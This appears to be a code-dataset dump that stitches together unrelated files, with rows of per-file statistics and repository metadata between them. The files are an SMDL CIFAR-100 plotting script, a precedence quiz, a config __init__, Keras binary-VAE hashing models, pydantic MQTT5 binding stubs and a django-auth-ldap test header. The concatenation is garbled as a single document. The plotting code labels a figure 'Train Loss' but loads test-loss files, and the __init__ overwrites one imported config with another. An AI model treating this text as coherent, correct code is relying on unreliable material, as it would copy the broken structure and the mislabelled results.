        'SMDL Refresh Rate-5', 'green'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh10_0212_123549/accuracies/train_acc_round_0_accuracy.pkl',
        'SMDL Refresh Rate-10', 'orange'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh25_0212_123328/accuracies/train_acc_round_0_accuracy.pkl',
        'SMDL Refresh Rate-25', 'm'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR100_ResNet32_refresh40_0221_223728/accuracies/train_acc_round_0_accuracy.pkl',
        'SMDL Refresh Rate-40', 'black'],
        # [
        # '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh50_0212_123140/accuracies/train_acc_round_0_accuracy.pkl',
        # 'SMDL Refresh Rate-50', 'black']
    ]
    plot_accuracies(train_data, title='CIFAR 100 Train Error with RF Ablation', save_location='./final_plots/cifar100/Refresh/')
    test_loss_data = [[
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_mean_accuracy.pkl',
        'Random Selection', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_upper_limit_accuracy.pkl',
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_lower_limit_accuracy.pkl'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_loss_round_0_accuracy.pkl',
        'SMDL Refresh Rate-5', 'green'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh10_0212_123549/accuracies/test_loss_round_0_accuracy.pkl',
        'SMDL Refresh Rate-10', 'orange'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh25_0212_123328/accuracies/test_loss_round_0_accuracy.pkl',
        'SMDL Refresh Rate-25', 'm'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR100_ResNet32_refresh40_0221_223728/accuracies/test_loss_round_0_accuracy.pkl',
        'SMDL Refresh Rate-40', 'black'],
        # [
        # '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh50_0212_123140/accuracies/test_loss_round_0_accuracy.pkl',
        # 'SMDL Refresh Rate-50', 'black']
    ]
    plot_accuracies(test_loss_data, title='CIFAR 100 Test Loss with RF Ablation', plot_type='Loss', save_location='./final_plots/cifar100/Refresh/')
    train_loss_data = [[
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_mean_accuracy.pkl',
        'Random Selection', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_upper_limit_accuracy.pkl',
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_lower_limit_accuracy.pkl'],
        [
        # NOTE(review): TRAIN-loss ablation figure but every SMDL entry below reads
        # test_loss pickles -- likely copy-paste; confirm against the data files.
        '/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_loss_round_0_accuracy.pkl',
        'SMDL Refresh Rate-5', 'green'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh10_0212_123549/accuracies/test_loss_round_0_accuracy.pkl',
        'SMDL Refresh Rate-10', 'orange'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh25_0212_123328/accuracies/test_loss_round_0_accuracy.pkl',
        'SMDL Refresh Rate-25', 'm'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR100_ResNet32_refresh40_0221_223728/accuracies/test_loss_round_0_accuracy.pkl',
        'SMDL Refresh Rate-40', 'black'],
        # [
        # '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh50_0212_123140/accuracies/test_loss_round_0_accuracy.pkl',
        # 'SMDL Refresh Rate-50', 'black']
    ]
    plot_accuracies(train_loss_data, title='CIFAR 100 Train Loss with RF Ablation', plot_type='Loss', save_location='./final_plots/cifar100/Refresh/')
| 62.272727
| 212
| 0.656271
| 1,761
| 15,070
| 5.220329
| 0.105622
| 0.049603
| 0.146851
| 0.170347
| 0.840748
| 0.823126
| 0.814642
| 0.814642
| 0.792886
| 0.787773
| 0
| 0.087013
| 0.235103
| 15,070
| 242
| 213
| 62.272727
| 0.710506
| 0.125614
| 0
| 0.404624
| 0
| 0
| 0.578903
| 0.500344
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011561
| false
| 0
| 0.034682
| 0
| 0.046243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fe48b296946247e97ad2d31e5a4afeb53cac385b
| 30
|
py
|
Python
|
Chapter 04/ch41k.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
Chapter 04/ch41k.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
Chapter 04/ch41k.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
# Precedence quiz: ** binds tightest (7**2 == 49), then * (3*5 == 15),
# then + (2+15 == 17), and & binds loosest: 17 & 49 == 17.
print(2 + 3 * 5 & 7 ** 2)
# prints: 17
| 10
| 24
| 0.4
| 7
| 30
| 1.714286
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.35
| 0.333333
| 30
| 3
| 25
| 10
| 0.25
| 0.066667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
fe6c73aab9a5655789293d99cf2998fe3fd967db
| 111
|
py
|
Python
|
dizoo/procgen/maze/entry/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 464
|
2021-07-08T07:26:33.000Z
|
2022-03-31T12:35:16.000Z
|
dizoo/procgen/maze/entry/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 177
|
2021-07-09T08:22:55.000Z
|
2022-03-31T07:35:22.000Z
|
dizoo/procgen/maze/entry/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 92
|
2021-07-08T12:16:37.000Z
|
2022-03-31T09:24:41.000Z
|
from .maze_ppo_config import main_config, create_config
# NOTE(review): this second import rebinds the same names, so after import the
# package exposes only the DQN main_config/create_config and the PPO ones are
# shadowed -- confirm this is intended.
from .maze_dqn_config import main_config, create_config
| 55.5
| 55
| 0.882883
| 18
| 111
| 5
| 0.444444
| 0.177778
| 0.355556
| 0.488889
| 0.755556
| 0.755556
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 111
| 2
| 56
| 55.5
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fe980797b792f640d2f480a499ac62e42f8e8dbb
| 11,680
|
py
|
Python
|
supervised_BAE.py
|
bolopenguin/SSb-VAE-Custom
|
ad5484e9d3d0e57fc632c365fdb4847bf64ee457
|
[
"Apache-2.0"
] | null | null | null |
supervised_BAE.py
|
bolopenguin/SSb-VAE-Custom
|
ad5484e9d3d0e57fc632c365fdb4847bf64ee457
|
[
"Apache-2.0"
] | null | null | null |
supervised_BAE.py
|
bolopenguin/SSb-VAE-Custom
|
ad5484e9d3d0e57fc632c365fdb4847bf64ee457
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import keras
from keras.layers import *
from keras.models import Sequential,Model
from keras import backend as K
from base_networks import *
import tensorflow as tf
def my_KL_loss(y_true, y_pred):
    """Categorical cross-entropy -sum(y_true * log(y_pred)) over the last axis,
    with predictions clipped to [epsilon, 1] to avoid log(0)."""
    clipped = K.clip(y_pred, K.epsilon(), 1)
    return -K.sum(y_true * K.log(clipped), axis=-1)
def my_binary_KL_loss(y_true, y_pred):
    """Binary cross-entropy summed over the last axis; both p and 1-p are
    clipped to [epsilon, 1] to keep the logs finite."""
    pos = K.clip(y_pred, K.epsilon(), 1)
    neg = K.clip(1.0 - y_pred, K.epsilon(), 1)
    return -K.sum(y_true * K.log(pos) + (1 - y_true) * K.log(neg), axis=-1)
def my_binary_KL_loss_stable(y_true, y_pred):
    """Numerically stable binary cross-entropy computed from recovered logits:
    max(z,0) - z*y + log(1 + exp(-|z|)) where z = sigmoid^-1(clipped y_pred).

    NOTE(review): unlike the sibling losses this sums over ALL axes (no
    axis=-1), so the batch dimension is folded in -- confirm that is intended.
    """
    probs = K.clip(y_pred, K.epsilon(), 1 - K.epsilon())
    z = K.log(probs) - K.log(1 - probs)  # invert the sigmoid
    terms = K.relu(z) - z * y_true + K.log(1 + K.exp(-K.abs(z)))
    return K.sum(terms)
def REC_loss(x_true, x_pred):
    """Reconstruction term: categorical cross-entropy -sum(x_true * log(x_pred))
    over the last axis, with predictions clipped to [epsilon, 1]."""
    safe = K.clip(x_pred, K.epsilon(), 1)
    return -K.sum(x_true * K.log(safe), axis=-1)
def traditional_VAE(data_dim,Nb,units,layers_e,layers_d,opt='adam',BN=True, summ=True, beta=0):
    """Build and compile a Gaussian-latent VAE.

    :param data_dim: input dimensionality.
    :param Nb: latent dimensionality.
    :param units, layers_e, layers_d, BN: architecture of the pre-encoder/generator.
    :param opt: Keras optimizer name/instance.
    :param summ: print model summaries when True.
    :param beta: weight on the KL term in the total loss.
    :return: (compiled VAE model, encoder mapping x -> z_mean, generator).
    """
    pre_encoder = define_pre_encoder(data_dim, layers=layers_e,units=units,BN=BN)
    if summ:
        print("pre-encoder network:")
        pre_encoder.summary()
    generator = define_generator(Nb,data_dim,layers=layers_d,units=units,BN=BN)
    if summ:
        print("generator network:")
        generator.summary()
    ## Encoder
    x = Input(shape=(data_dim,))
    hidden = pre_encoder(x)
    z_mean = Dense(Nb,activation='linear', name='z-mean')(hidden)
    z_log_var = Dense(Nb,activation='linear',name = 'z-log_var')(hidden)
    encoder = Model(x, z_mean) # build a model to project inputs on the latent space
    def sampling(args):
        # Reparameterization trick: z = mu + exp(log_var / 2) * eps, eps ~ N(0, 1).
        epsilon_std = 1.0
        z_mean, z_log_var = args
        epsilon = K.random_normal(shape=(K.shape(z_mean)[0], Nb),mean=0., stddev=epsilon_std)
        return z_mean + K.exp(0.5*z_log_var) * epsilon # + sigma (std dev)
    ## Decoder
    z_sampled = Lambda(sampling, output_shape=(Nb,), name='sampled')([z_mean, z_log_var])
    output = generator(z_sampled)
    Recon_loss = REC_loss
    kl_loss = KL_loss(z_mean,z_log_var)
    def VAE_loss(y_true, y_pred):
        # Total loss = reconstruction + beta * KL (beta-VAE weighting).
        return Recon_loss(y_true, y_pred) + beta*kl_loss(y_true, y_pred)
    traditional_vae = Model(x, output)
    traditional_vae.compile(optimizer=opt, loss=VAE_loss, metrics = [Recon_loss,kl_loss])
    return traditional_vae, encoder,generator
def sample_gumbel(shape,eps=K.epsilon()):
    """Return log(U + eps) - log(1 - U + eps) with U ~ Uniform(0, 1): the
    difference of two Gumbel(0,1) samples (logistic noise), used for the
    Binary Concrete / Gumbel-sigmoid relaxation.

    Note: the default eps is evaluated once at definition time.
    """
    uniform = K.random_uniform(shape, 0, 1)
    return K.log(uniform + eps) - K.log(1 - uniform + eps)
def VDSHS(data_dim,n_classes,Nb,units,layers_e,layers_d,opt='adam',BN=True, summ=True,tau_ann=False,beta=0,alpha=1.0,multilabel=False):
    """Build and compile a supervised Gaussian-latent VAE (VDSH-S style):
    the VAE of traditional_VAE plus a classification head on the sampled z.

    :param n_classes: size of the supervised output layer.
    :param alpha: loss weight of the supervised head.
    :param beta: weight on the KL term inside the VAE loss.
    :param multilabel: sigmoid head + binary CE when True, else softmax + CE.
    :return: (compiled model, encoder mapping x -> z_mean, generator).

    Note: tau_ann is accepted but not used anywhere in this body.
    """
    pre_encoder = define_pre_encoder(data_dim, layers=layers_e,units=units,BN=BN)
    if summ:
        print("pre-encoder network:")
        pre_encoder.summary()
    generator = define_generator(Nb,data_dim,layers=layers_d,units=units,BN=BN)
    if summ:
        print("generator network:")
        generator.summary()
    ## Encoder
    x = Input(shape=(data_dim,))
    hidden = pre_encoder(x)
    z_mean = Dense(Nb,activation='linear', name='z-mean')(hidden)
    z_log_var = Dense(Nb,activation='linear',name = 'z-log_var')(hidden)
    encoder = Model(x, z_mean) # build a model to project inputs on the latent space
    def sampling(args):
        # Reparameterization trick: z = mu + exp(log_var / 2) * eps, eps ~ N(0, 1).
        epsilon_std = 1.0
        z_mean, z_log_var = args
        epsilon = K.random_normal(shape=(K.shape(z_mean)[0], Nb),mean=0., stddev=epsilon_std)
        return z_mean + K.exp(0.5*z_log_var) * epsilon # + sigma (std dev)
    ## Decoder
    z_sampled = Lambda(sampling, output_shape=(Nb,), name='sampled')([z_mean, z_log_var])
    output = generator(z_sampled)
    Recon_loss = REC_loss
    kl_loss = KL_loss(z_mean,z_log_var)
    def VAE_loss(y_true, y_pred):
        return Recon_loss(y_true, y_pred) + beta*kl_loss(y_true, y_pred)
    # Supervised head is fed the SAMPLED latent code (not z_mean).
    if multilabel:
        supervised_layer = Dense(n_classes, activation='sigmoid',name='sup-class')(z_sampled)#req n_classes
    else:
        supervised_layer = Dense(n_classes, activation='softmax',name='sup-class')(z_sampled)#req n_classes
    traditional_vae = Model(inputs=x, outputs=[output,supervised_layer])
    if multilabel:
        traditional_vae.compile(optimizer=opt, loss=[VAE_loss,my_binary_KL_loss],loss_weights=[1., alpha], metrics=[Recon_loss,kl_loss])
    else:
        traditional_vae.compile(optimizer=opt, loss=[VAE_loss,my_KL_loss],loss_weights=[1., alpha], metrics=[Recon_loss,kl_loss])
    return traditional_vae, encoder,generator
def binary_VAE(data_dim,Nb,units,layers_e,layers_d,opt='adam',BN=True, summ=True,tau_ann=False,beta=0):
    """Build and compile a binary-latent VAE using the Gumbel-sigmoid
    (Binary Concrete) relaxation with temperature tau.

    :param tau_ann: when True, tau is a K.variable starting at 1.0 (meant to be
        annealed externally) and is also returned as a fourth value.
    :param beta: weight on the binary-KL term.
    :return: (vae, encoder mapping x -> logits_b, generator[, tau]).
    """
    if tau_ann:
        tau = K.variable(1.0, name="temperature")
    else:
        tau = K.variable(0.67, name="temperature") # or tau fixed at 0.67 = 2/3
    pre_encoder = define_pre_encoder(data_dim, layers=layers_e,units=units,BN=BN)
    if summ:
        print("pre-encoder network:")
        pre_encoder.summary()
    generator = define_generator(Nb,data_dim,layers=layers_d,units=units,BN=BN)
    if summ:
        print("generator network:")
        generator.summary()
    x = Input(shape=(data_dim,))
    hidden = pre_encoder(x)
    logits_b = Dense(Nb, activation='linear', name='logits-b')(hidden) #log(B_j/1-B_j)
    # proba = np.exp(logits_b)/(1+np.exp(logits_b)) = sigmoidal(logits_b) <- recovers the probability
    # dist = Dense(Nb, activation='sigmoid')(hidden) #p(b) -- alternative way to model it
    encoder = Model(x, logits_b)
    def sampling(logits_b):
        # Relaxed Bernoulli sample: sigmoid((logits + gumbel noise) / tau).
        #logits_b = K.log(aux/(1-aux) + K.epsilon() )
        b = logits_b + sample_gumbel(K.shape(logits_b)) # logits + gumbel noise
        return keras.activations.sigmoid( b/tau )
    b_sampled = Lambda(sampling, output_shape=(Nb,), name='sampled')(logits_b)
    output = generator(b_sampled)
    Recon_loss = REC_loss
    kl_loss = BKL_loss(logits_b)
    def BVAE_loss(y_true, y_pred):
        return Recon_loss(y_true, y_pred) + beta*kl_loss(y_true, y_pred)
    binary_vae = Model(x, output)
    binary_vae.compile(optimizer=opt, loss=BVAE_loss, metrics = [Recon_loss,kl_loss])
    if tau_ann:
        return binary_vae, encoder,generator ,tau
    else:
        return binary_vae, encoder,generator
def PSH_GS(data_dim,n_classes,Nb,units,layers_e,layers_d,opt='adam',BN=True, summ=True,tau_ann=False,beta=0,alpha=1.0,lambda_=1.0,multilabel=False):
    """Build and compile a supervised binary VAE for hashing (PSH with
    Gumbel-sigmoid sampling): reconstruction + binary KL on one head, and a
    label loss plus a pairwise Hamming-margin loss on the classification head.

    :param beta: weight on the binary-KL term inside the VAE loss.
    :param alpha: loss weight of the supervised (Hamming) head.
    :param lambda_: weight of the label prediction loss inside Hamming_loss.
    :param multilabel: sigmoid head + binary CE when True, else softmax + CE.
    :return: (model, encoder mapping x -> logits_b, generator[, tau]).
    """
    if tau_ann:
        tau = K.variable(1.0, name="temperature")
    else:
        tau = K.variable(0.67, name="temperature") # or tau fixed at 0.67 = 2/3
    pre_encoder = define_pre_encoder(data_dim, layers=layers_e,units=units,BN=BN)
    if summ:
        print("pre-encoder network:")
        pre_encoder.summary()
    generator = define_generator(Nb,data_dim,layers=layers_d,units=units,BN=BN)
    if summ:
        print("generator network:")
        generator.summary()
    x = Input(shape=(data_dim,))
    hidden = pre_encoder(x)
    logits_b = Dense(Nb, activation='linear', name='logits-b')(hidden)
    # Supervised head is fed the shared hidden representation.
    if multilabel:
        supervised_layer = Dense(n_classes, activation='sigmoid',name='sup-class')(hidden)#req n_classes
    else:
        supervised_layer = Dense(n_classes, activation='softmax',name='sup-class')(hidden)#req n_classes
    encoder = Model(x, logits_b)
    def sampling(logits_b):
        # Relaxed Bernoulli sample: sigmoid((logits + gumbel noise) / tau).
        #logits_b = K.log(aux/(1-aux) + K.epsilon() )
        b = logits_b + sample_gumbel(K.shape(logits_b)) # logits + gumbel noise
        return keras.activations.sigmoid( b/tau )
    b_sampled = Lambda(sampling, output_shape=(Nb,), name='sampled')(logits_b)
    output = generator(b_sampled)
    Recon_loss = REC_loss
    kl_loss = BKL_loss(logits_b)
    def SUP_BAE_loss_pointwise(y_true, y_pred):
        return Recon_loss(y_true, y_pred) + beta*kl_loss(y_true, y_pred)
    margin = Nb/3.0
    if multilabel:
        pred_loss = my_binary_KL_loss
    else:
        pred_loss = my_KL_loss
    def Hamming_loss(y_true, y_pred):
        # Pairwise squared distances D between sampled codes in the batch (BxB),
        # pulled together for same-label pairs and pushed beyond `margin` otherwise.
        r = tf.reduce_sum(b_sampled*b_sampled, 1)
        r = tf.reshape(r, [-1, 1])
        D = r - 2*tf.matmul(b_sampled, tf.transpose(b_sampled)) + tf.transpose(r) #BXB
        similar_mask = K.dot(y_true, K.transpose(y_true)) #BXB M_ij = I(y_i = y_j)
        loss_hamming = (1.0/Nb)*K.sum(similar_mask*D + (1.0-similar_mask)*K.relu(margin-D))
        return lambda_*pred_loss(y_true, y_pred) + loss_hamming
    #binary_vae = Model(inputs=[x,y], outputs=output)
    #binary_vae.compile(optimizer=opt, loss=SUP_BAE_loss_pointwise, metrics=[Recon_loss,kl_loss])
    binary_vae = Model(inputs=x, outputs=[output,supervised_layer])
    binary_vae.compile(optimizer=opt, loss=[SUP_BAE_loss_pointwise,Hamming_loss],loss_weights=[1., alpha], metrics=[Recon_loss,kl_loss,pred_loss])
    if tau_ann:
        return binary_vae, encoder,generator ,tau
    else:
        return binary_vae, encoder,generator
def SSBVAE(data_dim,n_classes,Nb,units,layers_e,layers_d,opt='adam',BN=True, summ=True,tau_ann=False,lambda_=0,alpha=1.0,beta=1.0,multilabel=False):
    """Build and compile the semi-supervised binary VAE (SSB-VAE):
    reconstruction + lambda_ * binary KL on one head, and on the supervised
    head a pointwise prediction loss weighted by beta plus a pairwise
    Hamming-margin loss weighted by alpha.

    :param multilabel: sigmoid head + stable binary CE when True, else
        softmax + categorical CE.
    :return: (model, encoder mapping x -> logits_b, generator[, tau]).
    """
    if tau_ann:
        tau = K.variable(1.0, name="temperature")
    else:
        tau = K.variable(0.67, name="temperature") # or tau fixed at 0.67 = 2/3
    pre_encoder = define_pre_encoder(data_dim, layers=layers_e,units=units,BN=BN)
    if summ:
        print("pre-encoder network:")
        pre_encoder.summary()
    generator = define_generator(Nb,data_dim,layers=layers_d,units=units,BN=BN)
    if summ:
        print("generator network:")
        generator.summary()
    x = Input(shape=(data_dim,))
    hidden = pre_encoder(x)
    logits_b = Dense(Nb, activation='linear', name='logits-b')(hidden) #log(B_j/1-B_j)
    if multilabel:
        supervised_layer = Dense(n_classes, activation='sigmoid',name='sup-class')(hidden)#req n_classes
    else:
        supervised_layer = Dense(n_classes, activation='softmax',name='sup-class')(hidden)#req n_classes
    encoder = Model(x, logits_b)
    def sampling(logits_b):
        # Relaxed Bernoulli sample: sigmoid((logits + gumbel noise) / tau).
        #logits_b = K.log(aux/(1-aux) + K.epsilon() )
        b = logits_b + sample_gumbel(K.shape(logits_b)) # logits + gumbel noise
        return keras.activations.sigmoid( b/tau )
    b_sampled = Lambda(sampling, output_shape=(Nb,), name='sampled')(logits_b)
    output = generator(b_sampled)
    Recon_loss = REC_loss
    kl_loss = BKL_loss(logits_b)
    def SUP_BAE_loss_pointwise(y_true, y_pred):
        return Recon_loss(y_true, y_pred) + lambda_*kl_loss(y_true, y_pred)
    margin = Nb/3.0
    if multilabel:
        pred_loss = my_binary_KL_loss_stable
    else:
        pred_loss = my_KL_loss
    def Hamming_loss(y_true, y_pred):
        #pred_loss = keras.losses.categorical_crossentropy(y_true, y_pred)
        # Pairwise squared distances D between sampled codes in the batch (BxB).
        r = tf.reduce_sum(b_sampled*b_sampled, 1)
        r = tf.reshape(r, [-1, 1])
        D = r - 2*tf.matmul(b_sampled, tf.transpose(b_sampled)) + tf.transpose(r) #BXB
        # NOTE(review): the similarity mask here is built from PREDICTIONS
        # (y_pred), not labels -- confirm this semi-supervised choice is intended.
        similar_mask = K.dot(y_pred, K.transpose(y_pred)) #BXB M_ij = I(y_i = y_j)
        loss_hamming = (1.0/Nb)*K.sum(similar_mask*D + (1.0-similar_mask)*K.relu(margin-D))
        return beta*pred_loss(y_true, y_pred) + alpha*loss_hamming
    binary_vae = Model(inputs=x, outputs=[output,supervised_layer])
    binary_vae.compile(optimizer=opt, loss=[SUP_BAE_loss_pointwise,Hamming_loss],loss_weights=[1., 1.], metrics=[Recon_loss,kl_loss,pred_loss])
    if tau_ann:
        return binary_vae, encoder,generator ,tau
    else:
        return binary_vae, encoder,generator
| 38.045603
| 148
| 0.672089
| 1,838
| 11,680
| 4.023939
| 0.093036
| 0.027042
| 0.018659
| 0.031098
| 0.871011
| 0.865603
| 0.857761
| 0.842888
| 0.827474
| 0.809221
| 0
| 0.011243
| 0.192808
| 11,680
| 306
| 149
| 38.169935
| 0.773229
| 0.093408
| 0
| 0.77169
| 0
| 0
| 0.047727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.100457
| false
| 0
| 0.031963
| 0.022831
| 0.246575
| 0.045662
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22865f57d0b712c2fd4683b00a65c077c11cd2bd
| 1,139
|
py
|
Python
|
asyncapi_schema_pydantic/v2_3_0/mqtt5_bindings.py
|
albertnadal/asyncapi-schema-pydantic
|
83966bdc11f2d465a10b52cec5ff79d18fa6f5fe
|
[
"MIT"
] | null | null | null |
asyncapi_schema_pydantic/v2_3_0/mqtt5_bindings.py
|
albertnadal/asyncapi-schema-pydantic
|
83966bdc11f2d465a10b52cec5ff79d18fa6f5fe
|
[
"MIT"
] | null | null | null |
asyncapi_schema_pydantic/v2_3_0/mqtt5_bindings.py
|
albertnadal/asyncapi-schema-pydantic
|
83966bdc11f2d465a10b52cec5ff79d18fa6f5fe
|
[
"MIT"
] | null | null | null |
from pydantic import BaseModel, Extra
class Mqtt5ChannelBinding(BaseModel):
    """MQTT 5 channel binding object (AsyncAPI).

    This object MUST NOT contain any properties. Its name is reserved for
    future use.
    """

    class Config:
        # The binding is defined as empty, so any supplied field must be
        # rejected as a validation error rather than silently accepted.
        extra = Extra.forbid
class Mqtt5MessageBinding(BaseModel):
    """MQTT 5 message binding object (AsyncAPI).

    This object MUST NOT contain any properties. Its name is reserved for
    future use.
    """

    class Config:
        # The binding is defined as empty, so any supplied field must be
        # rejected as a validation error rather than silently accepted.
        extra = Extra.forbid
class Mqtt5OperationBinding(BaseModel):
    """MQTT 5 operation binding object (AsyncAPI).

    This object MUST NOT contain any properties. Its name is reserved for
    future use.
    """

    class Config:
        # The binding is defined as empty, so any supplied field must be
        # rejected as a validation error rather than silently accepted.
        extra = Extra.forbid
class Mqtt5ServerBinding(BaseModel):
    """MQTT 5 server binding object (AsyncAPI).

    This object MUST NOT contain any properties. Its name is reserved for
    future use.
    """

    class Config:
        # The binding is defined as empty, so any supplied field must be
        # rejected as a validation error rather than silently accepted.
        extra = Extra.forbid
| 22.78
| 85
| 0.703248
| 141
| 1,139
| 5.680851
| 0.262411
| 0.064919
| 0.104869
| 0.139825
| 0.857678
| 0.857678
| 0.857678
| 0.857678
| 0.857678
| 0.857678
| 0
| 0.009238
| 0.239684
| 1,139
| 49
| 86
| 23.244898
| 0.915704
| 0.568042
| 0
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.692308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
22e519b0dcbf03b30f8a44ed0349936fbe28ec41
| 77,747
|
py
|
Python
|
tests/tests.py
|
NoNameItem/cool-django-auth-ldap
|
58920e50bc85b7ffa9337468e5e6256dfcfd27e7
|
[
"MIT"
] | null | null | null |
tests/tests.py
|
NoNameItem/cool-django-auth-ldap
|
58920e50bc85b7ffa9337468e5e6256dfcfd27e7
|
[
"MIT"
] | 3
|
2019-11-17T16:52:56.000Z
|
2020-01-24T12:16:59.000Z
|
tests/tests.py
|
NoNameItem/cool-django-auth-ldap
|
58920e50bc85b7ffa9337468e5e6256dfcfd27e7
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2019, Artem Vasin
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import contextlib
import functools
import logging
import os
import pickle
import warnings
from copy import deepcopy
import ldap
import mock
import slapdtest
from django.contrib.auth import authenticate, get_backends
from django.contrib.auth.models import Group, Permission, User
from django.core.cache import cache
